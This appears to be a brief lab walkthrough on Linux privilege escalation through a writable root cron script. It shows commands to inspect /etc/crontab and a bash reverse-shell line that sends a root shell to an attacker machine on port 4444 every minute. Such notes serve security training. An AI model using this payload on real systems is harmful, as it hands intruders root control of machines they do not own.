Cron jobs are programs or scripts which users can schedule to run at specific times or intervals. Cron table files (crontabs) store the configuration for cron jobs. The system-wide crontab is located at /etc/crontab.

==================================================================================================================

cat /etc/crontab

#all systemwide details
==================================================================================================================

There should be two cron jobs scheduled to run every minute.
it runs:
1. overwrite.sh, the other runs
2. /usr/local/bin/compress.sh 

==================================================================================================================

locate overwrite.sh

ls -l /usr/local/bin/overwrite.sh

==================================================================================================================

Replace the contents of the overwrite.sh file with the following after changing the IP address to that of your Kali box.

#!/bin/bash
bash -i >& /dev/tcp/ip/4444 0>&1

==================================================================================================================

we get root shell and it refresh in one minute so every one min can get a new shell but on same port.

==================================================================================================================


